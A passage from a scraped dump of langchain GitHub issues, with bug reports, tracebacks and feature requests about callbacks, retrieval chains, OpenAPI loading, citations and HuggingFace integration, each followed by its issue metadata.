2. There might be people who want to keep their console quiet.
### Your contribution
I will make a PR | Make tqdm optional for OpenAIEmbeddings | https://api.github.com/repos/langchain-ai/langchain/issues/7246/comments | 1 | 2023-07-06T02:21:17Z | 2023-07-06T03:58:55Z | https://github.com/langchain-ai/langchain/issues/7246 | 1,790,672,805 | 7,246 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
A continuation of #7126,
Pinecone features in Langchain that are not mentioned in Langchain's documentation. https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/pinecone
### Idea or request for content:
Add documentation for the other Pinecone functions. | DOC: Pinecone functions need more documentation | https://api.github.com/repos/langchain-ai/langchain/issues/7243/comments | 1 | 2023-07-06T00:15:48Z | 2023-10-12T16:06:20Z | https://github.com/langchain-ai/langchain/issues/7243 | 1,790,553,866 | 7,243 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain Version: 0.0.224
Platform: Mac
Python Version: 3.10.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [x] Callbacks/Tracing
- [x] Async
### Reproduction
Copy/Paste of example snippet from official documentation:
https://python.langchain.com/docs/modules/callbacks/how_to/async_callbacks
import asyncio
from typing import Any, Dict, List
from langchain.chat_models import ChatOpenAI
from langchain.schema import LLMResult, HumanMessage
from langchain.callbacks.base import AsyncCallbackHandler, BaseCallbackHandler
from dotenv import load_dotenv
load_dotenv()
class MyCustomSyncHandler(BaseCallbackHandler):
def on_llm_new_token(self, token: str, **kwargs) -> None:
print(f"Sync handler being called in a `thread_pool_executor`: token: {token}")
class MyCustomAsyncHandler(AsyncCallbackHandler):
"""Async callback handler that can be used to handle callbacks from langchain."""
async def on_llm_start(
self, serialized: Dict[str, Any], prompts: List[str], **kwargs: Any
) -> None:
"""Run when chain starts running."""
print("zzzz....")
await asyncio.sleep(0.3)
class_name = serialized["name"]
print("Hi! I just woke up. Your llm is starting")
async def on_llm_end(self, response: LLMResult, **kwargs: Any) -> None:
"""Run when chain ends running."""
print("zzzz....")
await asyncio.sleep(0.3)
print("Hi! I just woke up. Your llm is ending")
# To enable streaming, we pass in `streaming=True` to the ChatModel constructor
# Additionally, we pass in a list with our custom handler
chat = ChatOpenAI(
max_tokens=25,
streaming=True,
callbacks=[MyCustomSyncHandler(), MyCustomAsyncHandler()],
)
async def main():
await chat.agenerate([[HumanMessage(content="Tell me a joke")]])
if __name__ == '__main__':
asyncio.run(main())
#####################################################
Output:
zzzz....
Error in MyCustomAsyncHandler.on_llm_start callback: 'name'
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 1.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 2.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 4.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 8.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 16.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Traceback (most recent call last):
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 980, in _wrap_create_connection
return await self._loop.create_connection(*args, **kwargs) # type: ignore[return-value] # noqa
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/base_events.py", line 1097, in create_connection
transport, protocol = await self._create_connection_transport(
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/base_events.py", line 1127, in _create_connection_transport
await waiter
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/sslproto.py", line 534, in data_received
ssldata, appdata = self._sslpipe.feed_ssldata(data)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/sslproto.py", line 188, in feed_ssldata
self._sslobj.do_handshake()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/ssl.py", line 975, in do_handshake
self._sslobj.do_handshake()
ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:997)
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_requestor.py", line 592, in arequest_raw
result = await session.request(**request_kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/client.py", line 536, in _request
conn = await self._connector.connect(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 540, in connect
proto = await self._create_connection(req, traces, timeout)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 901, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 1206, in _create_direct_connection
raise last_exc
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 1175, in _create_direct_connection
transp, proto = await self._wrap_create_connection(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 982, in _wrap_create_connection
raise ClientConnectorCertificateError(req.connection_key, exc) from exc
aiohttp.client_exceptions.ClientConnectorCertificateError: Cannot connect to host api.openai.com:443 ssl:True [SSLCertVerificationError: (1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:997)')]
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/Users/pnsvk/my-apps/p_y/llm-apps/async_callbacks.py", line 49, in <module>
asyncio.run(main())
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
return future.result()
File "/Users/pnsvk/my-apps/p_y/llm-apps/async_callbacks.py", line 45, in main
res = await chat.agenerate([[HumanMessage(content="Tell me a joke")]])
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/base.py", line 191, in agenerate
raise exceptions[0]
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/base.py", line 292, in _agenerate_with_cache
return await self._agenerate(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 408, in _agenerate
async for stream_resp in await acompletion_with_retry(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 95, in acompletion_with_retry
return await _completion_with_retry(**kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/_asyncio.py", line 86, in async_wrapped
return await fn(*args, **kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/_asyncio.py", line 48, in __call__
do = self.iter(retry_state=retry_state)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/__init__.py", line 362, in iter
raise retry_exc.reraise()
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/__init__.py", line 195, in reraise
raise self.last_attempt.result()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py", line 451, in result
return self.__get_result()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result
raise self._exception
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/_asyncio.py", line 51, in __call__
result = await fn(*args, **kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 93, in _completion_with_retry
return await llm.client.acreate(**kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_resources/chat_completion.py", line 45, in acreate
return await super().acreate(*args, **kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py", line 217, in acreate
response, _, api_key = await requestor.arequest(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_requestor.py", line 304, in arequest
result = await self.arequest_raw(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_requestor.py", line 609, in arequest_raw
raise error.APIConnectionError("Error communicating with OpenAI") from e
openai.error.APIConnectionError: Error communicating with OpenAI
### Expected behavior
As mentioned in the official documentation:
zzzz....
Hi! I just woke up. Your llm is starting
Sync handler being called in a `thread_pool_executor`: token:
Sync handler being called in a `thread_pool_executor`: token: Why
Sync handler being called in a `thread_pool_executor`: token: don
Sync handler being called in a `thread_pool_executor`: token: 't
Sync handler being called in a `thread_pool_executor`: token: scientists
Sync handler being called in a `thread_pool_executor`: token: trust
Sync handler being called in a `thread_pool_executor`: token: atoms
Sync handler being called in a `thread_pool_executor`: token: ?
Sync handler being called in a `thread_pool_executor`: token:
Sync handler being called in a `thread_pool_executor`: token: Because
Sync handler being called in a `thread_pool_executor`: token: they
Sync handler being called in a `thread_pool_executor`: token: make
Sync handler being called in a `thread_pool_executor`: token: up
Sync handler being called in a `thread_pool_executor`: token: everything
Sync handler being called in a `thread_pool_executor`: token: .
Sync handler being called in a `thread_pool_executor`: token:
zzzz....
Hi! I just woke up. Your llm is ending
LLMResult(generations=[[ChatGeneration(text="Why don't scientists trust atoms? \n\nBecause they make up everything.", generation_info=None, message=AIMessage(content="Why don't scientists trust atoms? \n\nBecause they make up everything.", additional_kwargs={}, example=False))]], llm_output={'token_usage': {}, 'model_name': 'gpt-3.5-turbo'}) | Async callback has issues | https://api.github.com/repos/langchain-ai/langchain/issues/7242/comments | 2 | 2023-07-06T00:03:04Z | 2023-07-06T12:43:26Z | https://github.com/langchain-ai/langchain/issues/7242 | 1,790,539,904 | 7,242 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Include source document index information in the combine document chain prompt. For example in `_get_inputs` of `StuffDocumentChain` we could make the following change (in addition to corresponding changes to `format_document`):
```
# From
doc_strings = [format_document(doc, self.document_prompt) for doc in docs]
# To
doc_strings = [format_document(doc, i, self.document_prompt) for i, doc in enumerate(docs)]
```
### Motivation
The point of this change is to enable QA based chains (e.g. `ConversationalRetrievalChain`) to easily do inline citations using the source document's index.
## Example
### Prompt
```
Context:
[1] Harrison went to Harvard.
[2] Ankush went to Princeton.
[3] Emma went to Yale.
Question:
Where did Harrison and Emma go to college?
```
### Response
```
Harrison went to Harvard【1】 and Emma went to Yale【3】.
```
This type of structure is also found in popular "QA" models like Bing Chat and ChatGPT's Browse feature (WebGPT etc.). I feel like there should at least be high-level options to enable something like this without having to make custom modifications/extensions to the existing chains.
Without explicitly including these document indices, I find prompting the LLM to cite documents by index could lead to hallucinated citations (e.g. with retrieved `k=4` documents it cites "[8]")
## More Details
As far as I can tell, existing QA implementations in Langchain seem to return source documents separately (i.e. `return_source_documents=True`), or at the end of the response (e.g. `{'output_text': ' The president thanked Justice Breyer for his service.\nSOURCES: 30-pl'}` as in [document-qa-with-sources](https://python.langchain.com/docs/modules/chains/additional/question_answering#document-qa-with-sources)) rather than provide them in-line.
Even newer approaches using OpenAI's Functions API e.g. from `create_citation_fuzzy_match_chain` and `create_qa_with_sources_chain` do not provide this option.
The approach of [QA with sources chain](https://python.langchain.com/docs/modules/chains/additional/openai_functions_retrieval_qa) has a drawback that the LLM has to generate the entire source of the document (e.g. full URL). This is slower because we can just reference the index of the document instead. Also, this is prone to hallucination especially with `gpt-3.5` where fake sources (like URLs) could be generated.
Similarly, the method in [Question-Answering Citations](https://python.langchain.com/docs/modules/chains/additional/qa_citations) provides quotes from source documents, but doesn't actually identify which document they're from. Referencing documents by index should help reduce hallucination and generation speed here as well.
### Your contribution
I'm happy to assist with this, but first I'd like to gather feedback on the idea. It's possible that there are existing approaches or best practices that I'm not familiar with, which could facilitate inline citations without additional implementation. If there are any recommendations on how to proceed with this, I'd be interested in having a discussion around that. | Add Document Index Information for QA Inline Citations | https://api.github.com/repos/langchain-ai/langchain/issues/7239/comments | 22 | 2023-07-05T22:46:45Z | 2024-05-16T16:06:39Z | https://github.com/langchain-ai/langchain/issues/7239 | 1,790,462,714 | 7,239 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain: '0.0.218'
windows 10
### Who can help?
@dev2049 @homanp
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run the following:
```py
from langchain.chains.openai_functions.openapi import get_openapi_chain
chain = get_openapi_chain("https://chat-web3-plugin.alchemy.com/openapi.yaml")
chain.run("DOES NOT MATTER")
```
Results in endless loop
```shell
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
...
```
### Expected behavior
Loop should break | OpenAPISpec functions can get stuck in a loop | https://api.github.com/repos/langchain-ai/langchain/issues/7233/comments | 2 | 2023-07-05T21:31:57Z | 2023-10-12T16:06:26Z | https://github.com/langchain-ai/langchain/issues/7233 | 1,790,374,247 | 7,233 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Still new here so I mimicked the setup of `llm/llamacpp.py` wrapper for the draft of Salesforce's new LLM [XGen](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard/discussions/91).
### Motivation
Expand the LLM sets integrated in Langchain.
### Your contribution
PR #7221 | Salesforce XGen integration | https://api.github.com/repos/langchain-ai/langchain/issues/7223/comments | 1 | 2023-07-05T19:54:04Z | 2023-07-06T04:53:07Z | https://github.com/langchain-ai/langchain/issues/7223 | 1,790,201,590 | 7,223 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Hi I found myself having to do a "hack" when using MultiPromptChain.
In particular when ny destination chains take more than one parameter into the template at runtime for example "{current"_timestamp}"
I was getting the following exception
```
File "/home/xxx/venv/lib/python3.10/site-packages/langchain/chains/base.py", line 149, in __call__
inputs = self.prep_inputs(inputs)
File "/home/xxx/venv/lib/python3.10/site-packages/langchain/chains/base.py", line 258, in prep_inputs
self._validate_inputs(inputs)
File "/home/xyz/venv/lib/python3.10/site-packages/langchain/chains/base.py", line 103, in _validate_inputs
raise ValueError(f"Missing some input keys: {missing_keys}")
ValueError: Missing some input keys: {'current_timestamp'}
```
I had the below configuration:
```
destinations = [f"{p['name']}: {p['description']}" for p in tools.prompt_infos]
destinations_str = "\n".join(destinations)
router_template = MULTI_PROMPT_ROUTER_TEMPLATE.format(destinations=destinations_str,
current_timestamp=datetime.now().isoformat())
router_prompt = PromptTemplate(
template=router_template,
input_variables=["input"],
output_parser=RouterOutputParser(),
)
router_chain = LLMRouterChain.from_llm(llm, router_prompt)
chain = MultiPromptChain(
router_chain=router_chain,
destination_chains=tools.chains,
default_chain=default_chain
verbose=True,
)
```
which had to be modified
first:
I used modified router template
```
MY_MULTI_PROMPT_ROUTER_TEMPLATE = """\
Given a raw text input to a language model select the model prompt best suited for \
the input. You will be given the names of the available prompts and a description of \
what th
MY_MULTI_PROMPT_ROUTER_TEMPLATE = """\
Given a raw text input to a language model select the model prompt best suited for \
the input. You will be given the names of the available prompts and a description of \
what the prompt is best suited for. You may also revise the original input if you \
think that revising it will ultimately lead to a better response from the language \
model.
<< FORMATTING >>
Return a markdown code snippet with a JSON object formatted to look like:
```json
{{{{
"destination": string \\ name of the prompt to use or "DEFAULT"
"next_inputs": dict \\ dictionary of the with two fields "input" containing original input and current_timestamp containing {current_timestamp}
}}}}
```
REMEMBER: "destination" MUST be one of the candidate prompt names specified below OR
it can be "DEFAULT" if the input is not well suited for any of the candidate prompts.
REMEMBER: "next_inputs" can just be the original input if you don't think any \
modifications are needed.
<< CANDIDATE PROMPTS >>
{destinations}
<< INPUT >>
{{input}}
<< OUTPUT >>
"""e prompt is best suited for. You may also revise the original input if you \
think that revising it will ultimately lead to a better response from the language \
model.
<< FORMATTING >>
Return a markdown code snippet with a JSON object formatted to look like:
```json
{{{{
"destination": string \\ name of the prompt to use or "DEFAULT"
"next_inputs": dict \\ dictionary of the with two fields "input" containing original input and current_timestamp containing {current_timestamp}
}}}}
```
REMEMBER: "destination" MUST be one of the candidate prompt names specified below OR
it can be "DEFAULT" if the input is not well suited for any of the candidate prompts.
REMEMBER: "next_inputs" can just be the original input if you don't think any \
modifications are needed.
<< CANDIDATE PROMPTS >>
{destinations}
<< INPUT >>
{{input}}
<< OUTPUT >>
"""
```
I also had to change the implementation of RouterOutputParser where I changed
line 102 from
```
parsed["next_inputs"] = {self.next_inputs_inner_key: parsed["next_inputs"]}
to
parsed["next_inputs"] = parsed["next_inputs"]
```
This has allowed me to return and pass the desired next_inputs dict including current_timestamp into the destination chain
my chain initialization has changed to the following
```
destinations = [f"{p['name']}: {p['description']}" for p in tools.prompt_infos]
destinations_str = "\n".join(destinations)
router_template = MY_MULTI_PROMPT_ROUTER_TEMPLATE.format(destinations=destinations_str,
current_timestamp=datetime.now().isoformat())
router_prompt = PromptTemplate(
template=router_template,
input_variables=["input"],
output_parser=MyRouterOutputParser(next_inputs_inner_key="input", next_inputs_type=dict),
)
router_chain = LLMRouterChain.from_llm(llm, router_prompt)
chain = MultiPromptChain(
router_chain=router_chain,
destination_chains=tools.chains,
default_chain=tools.chains[ConversationStage.CASUAL.value],
verbose=True,
)
```
so I managed to pass the correct parameters to the destination chain but then I faced a new issue which was
File "/home/xxx/venv/lib/python3.10/site-packages/langchain/memory/utils.py", line 21, in get_prompt_input_key
raise ValueError(f"One input key expected got {prompt_input_keys}")
ValueError: One input key expected got ['current_timestamp', 'input']
after investigation I had to define a new MyConversationBufferMemory
```
class MyConversationBufferMemory(ConversationBufferMemory):
other_keys: list = []
@property
def memory_variables(self) -> List[str]:
"""Will always return list of memory variables.
:meta private:
"""
return [self.memory_key] + self.other_keys
```
and instead of creating my memory in this way
`memory = ConversationBufferMemory(memory_key="chat_history", chat_memory=get_history(user_id))
`
I have created it in this way
`memory = MyConversationBufferMemory(memory_key="chat_history", chat_memory=get_history(user_id),other_keys=['current_timestamp'])`
this has finally allowed me to get get the response from the destination chain.
If someone has followed, would you thing that there is a better way of doing it?
### Suggestion:
_No response_ | Issue: Issue with MutliPromptRouter with memory destination chains | https://api.github.com/repos/langchain-ai/langchain/issues/7220/comments | 2 | 2023-07-05T19:50:23Z | 2023-10-12T16:06:31Z | https://github.com/langchain-ai/langchain/issues/7220 | 1,790,197,414 | 7,220 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Add retry policy to VertexAI models.
### Motivation
E.g., when trying to run a summarization chain on many chunks (I reproduce the error with 99 chunks), an exception `ResourceExhausted: 429 Quota exceeded` might be returned by Vertex.
### Your contribution
yes, I'll submit a PR shortly. | Add retries to VertexAI models | https://api.github.com/repos/langchain-ai/langchain/issues/7217/comments | 1 | 2023-07-05T18:45:48Z | 2023-07-10T08:52:37Z | https://github.com/langchain-ai/langchain/issues/7217 | 1,790,092,753 | 7,217 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
More of a clarification than an issue. In the javascript documentation, it describes the Document interface. https://js.langchain.com/docs/modules/schema/document. Does an equivalent thing exist in the Python version. When I try 'from langchain.document import Document` in python, it throws an error?
### Idea or request for content:
_No response_ | DOC: DOCUMENT interface in Javascript but not in Python | https://api.github.com/repos/langchain-ai/langchain/issues/7215/comments | 2 | 2023-07-05T18:15:21Z | 2023-07-05T18:41:14Z | https://github.com/langchain-ai/langchain/issues/7215 | 1,790,052,100 | 7,215 |
[
"langchain-ai",
"langchain"
] | ### System Info
There seem to be some hallucinations involving the president and Michael Jackson.
I use the following, where `data` is loaded using `UnstructuredURLLoader(urls).load()` and `urls` is just a list of URLs I'm interested in. Needless to say that none of the URLs involve Michael Jackson (or the president, for that matter)
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
chain = RetrievalQAWithSourcesChain.from_chain_type(
llm= HuggingFaceHub(
repo_id="tiiuae/falcon-7b-instruct",
model_kwargs={"max_new_tokens": 500}
),
chain_type="map_reduce",
retriever=FAISS.from_documents(doc_splitter.split_documents(data),
HuggingFaceEmbeddings()).as_retriever()
)
```
followed by
```
prompt = "some text unrelated to Michael Jackson."
chain({"question": prompt}, return_only_outputs=True)
```
I believe this occurs as part of the `map_reduce.py` file:
```
result, extra_return_dict = self.reduce_documents_chain.combine_docs(
result_docs, callbacks=callbacks, **kwargs
)
```
### Expected behavior
should have provided some answer w.r.t to the provided data, stored in FAISS vectorbase | Undesired outputs when using map_reduce | https://api.github.com/repos/langchain-ai/langchain/issues/7199/comments | 2 | 2023-07-05T13:55:41Z | 2023-07-08T17:20:32Z | https://github.com/langchain-ai/langchain/issues/7199 | 1,789,623,893 | 7,199 |
[
"langchain-ai",
"langchain"
] | ### System Info
**Python : Python 3.9.13
Langchain: langchain==0.0.219
OS : Ubuntu**
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.chains import ConversationalRetrievalChain
from langchain.vectorstores import Chroma
from langchain.embeddings import SentenceTransformerEmbeddings
embeddings = SentenceTransformerEmbeddings(model_name="paraphrase-MiniLM-L6-v2")
from langchain.document_loaders import PyPDFLoader
loader = PyPDFLoader("file.pdf")
documents = loader.load()
from langchain.llms import HuggingFaceHub
model = HuggingFaceHub(repo_id="facebook/mbart-large-50",
model_kwargs={"temperature": 0, "max_length":200},
huggingfacehub_api_token=HUGGING_FACE_API_KEY)
from langchain.text_splitter import CharacterTextSplitter
text_splitter = CharacterTextSplitter(chunk_size=100, chunk_overlap=0)
texts=text_splitter.split_documents(documents)
db = Chroma.from_documents(texts, embeddings)
retriever = db.as_retriever(search_type="similarity", search_kwargs={"k": 1})
qa = ConversationalRetrievalChain.from_llm(model,retriever)
chat_history= []
query = "sample query"
result = qa({"question": query,"chat_history":chat_history})
print("\nResult of ConversationalRetrievalChainMethod")
print(result)
```
It return the **result** as follows
{'question': 'sample question', 'chat_history': [], '**answer': "Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.**"}
### Expected behavior
Expecting the answer in the result. But it returns the prompt itself now | ConversationalRetrievalChain return only the prompt not the answer | https://api.github.com/repos/langchain-ai/langchain/issues/7193/comments | 4 | 2023-07-05T11:58:18Z | 2023-11-20T16:06:21Z | https://github.com/langchain-ai/langchain/issues/7193 | 1,789,401,709 | 7,193 |
[
"langchain-ai",
"langchain"
] | https://github.com/hwchase17/langchain/blob/e27ba9d92bd2cc4ac9ed7439becb2d32816fc89c/langchain/llms/huggingface_pipeline.py#L169
should modified to
#response = self.pipeline(prompt)
response = self.pipeline(prompt, **kwargs) | kwargs are forgot to send to huggingface pipeline call | https://api.github.com/repos/langchain-ai/langchain/issues/7192/comments | 3 | 2023-07-05T11:18:41Z | 2023-12-19T00:50:02Z | https://github.com/langchain-ai/langchain/issues/7192 | 1,789,340,428 | 7,192 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
When using AgentType.OPENAI_FUNCTIONS, the error message "openai.error.InvalidRequestError: 'Gmail: Find Email' does not match '^[a-zA-Z0-9_-]{1,64}$' - '[functions.6.name](http://functions.6.name/)'" suggests that the name you are using for the function ('Gmail: Find Email') does not adhere to the naming conventions.
For AgentType.OPENAI_FUNCTIONS, function names can only contain alphanumeric characters, underscores (_), and hyphens (-). The name must be between 1 and 64 characters long.
To resolve this issue, make sure the name you provide for the function complies with the naming rules mentioned above.
If you need further assistance, please provide more details about the specific function you're trying to use, and I'll be happy to help you further.
### Suggestion:
_No response_ | Issue: <Please write a comprehensive title after the 'Issue: ' prefix> | https://api.github.com/repos/langchain-ai/langchain/issues/7191/comments | 3 | 2023-07-05T10:53:22Z | 2023-10-12T16:06:36Z | https://github.com/langchain-ai/langchain/issues/7191 | 1,789,300,649 | 7,191 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I have written a code to add the memory to ConversationalRetrievalChain but I am getting an error **"Missing some input keys: {'question'}"**. Below is the snippet of my code
memory = ConversationBufferMemory(
memory_key="chat_history",
input_key="question"
)
chatTemplate = """
Answer the question based on the chat history(delimited by <hs></hs>) and context(delimited by <ctx> </ctx>) below.
-----------
<ctx>
{context}
</ctx>
-----------
<hs>
{chat_history}
</hs>
-----------
Question: {question}
Answer:
"""
promptHist = PromptTemplate(
input_variables=["context", "question", "chat_history"],
template=chatTemplate
)
retriever = chatDb.as_retriever(search_type="similarity", search_kwargs={"k": 2})
qa = ConversationalRetrievalChain.from_llm(
llm=get_openai_model(), chain_type="stuff", retriever=retriever, return_source_documents=True,
verbose = True,
combine_docs_chain_kwargs={'prompt': promptHist},
memory = memory,
)
result = qa({"query": prompt["prompt"]})
### Suggestion:
_No response_ | Issue: Missing some input keys: {'question'} when using ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7190/comments | 6 | 2023-07-05T10:50:07Z | 2024-03-04T14:32:18Z | https://github.com/langchain-ai/langchain/issues/7190 | 1,789,293,722 | 7,190 |
[
"langchain-ai",
"langchain"
] | ### System Info
I am trying to build a **VectorstoreIndexCreator** using the following configuration
embeddings= **SentenceTransformerEmbeddings** embeddings
vectorstore_cls = **Chroma**
llm = **HuggingfaceHub** Model
Note: I am not using any **openai** model as **llm** or **embedding** purpose
here is the code
```
from langchain.indexes import VectorstoreIndexCreator
from langchain.vectorstores import Chroma
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import SentenceTransformerEmbeddings
from langchain.llms import HuggingFaceHub
from langchain.document_loaders import PyPDFLoader
loader = PyPDFLoader("pdffile.pdf")
embeddings = SentenceTransformerEmbeddings(model_name="paraphrase-MiniLM-L6-v2")
model = HuggingFaceHub(repo_id="facebook/mbart-large-50",
model_kwargs={"temperature": 0, "max_length":200},
huggingfacehub_api_token=HUGGING_FACE_API_KEY)
index = VectorstoreIndexCreator(
embeddings=embeddings,
vectorstore_cls=Chroma,
text_splitter=CharacterTextSplitter(chunk_size=100,chunk_overlap=0)
).from_loaders([loader])
result = index.query(llm=model,qustion=query,chain_type="refine")
```
But still iam getting the open_ai key dependency error when i run the code
```
Did not find openai_api_key, please add an environment variable `OPENAI_API_KEY` which contains it, or pass `openai_api_key` as a named parameter. (type=value_error)
```
using langchain version: **langchain==0.0.219**
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.indexes import VectorstoreIndexCreator
from langchain.vectorstores import Chroma
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import SentenceTransformerEmbeddings
from langchain.llms import HuggingFaceHub
from langchain.document_loaders import PyPDFLoader
loader = PyPDFLoader("pdffile.pdf")
embeddings = SentenceTransformerEmbeddings(model_name="paraphrase-MiniLM-L6-v2")
model = HuggingFaceHub(repo_id="facebook/mbart-large-50",
model_kwargs={"temperature": 0, "max_length":200},
huggingfacehub_api_token=HUGGING_FACE_API_KEY)
index = VectorstoreIndexCreator(
embeddings=embeddings,
vectorstore_cls=Chroma,
text_splitter=CharacterTextSplitter(chunk_size=100,chunk_overlap=0)
